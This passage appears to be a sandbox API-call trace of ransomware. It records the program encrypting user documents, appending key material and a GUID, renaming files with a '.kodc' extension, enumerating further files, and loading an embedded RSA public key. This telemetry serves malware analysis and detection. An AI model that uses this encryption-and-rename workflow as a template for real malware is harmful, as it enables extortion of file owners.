returned 1 [0098.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a910 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a8f8 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.216] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.216] GetCurrentThreadId () returned 0x42c [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e6f8 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.217] GetCurrentThreadId () returned 0x42c [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a910 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8e0 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a928 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8f8 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8f8 | out: hHeap=0x630000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a928 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a910 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8e0 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8c8 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69d4a8 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.220] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x3b44, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x3b44, lpOverlapped=0x0) returned 1 [0098.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.221] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3b49, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.221] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.221] CloseHandle (hObject=0x5cc) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.223] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.223] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D68-UMcj xt ZPs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d68-umcj xt zps.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\D68-UMcj xt ZPs.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\d68-umcj xt zps.pptx.kodc")) returned 1 [0098.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.224] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.225] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0098.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.225] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0098.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.225] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ea819a0, ftCreationTime.dwHighDateTime=0x1d5ba7d, ftLastAccessTime.dwLowDateTime=0x635f90d0, ftLastAccessTime.dwHighDateTime=0x1d5b7a2, ftLastWriteTime.dwLowDateTime=0x635f90d0, ftLastWriteTime.dwHighDateTime=0x1d5b7a2, nFileSizeHigh=0x0, nFileSizeLow=0x1569c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dKkQF0XTG.odp", cAlternateFileName="DKKQF0~1.ODP")) returned 1 [0098.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.226] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKkQF0XTG.odp") returned=".odp" [0098.226] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dKkQF0XTG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dkkqf0xtg.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.226] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=87708) returned 1 [0098.226] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.229] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.229] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.230] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.230] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.230] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1569c, lpOverlapped=0x0) returned 1 [0098.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.231] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.231] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.231] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.232] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.232] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.232] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.232] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.232] GetLastError () returned 0x0 [0098.232] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.232] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.232] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.232] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.232] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.232] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.232] RtlAllocateHeap (HeapHandle=0x630000, 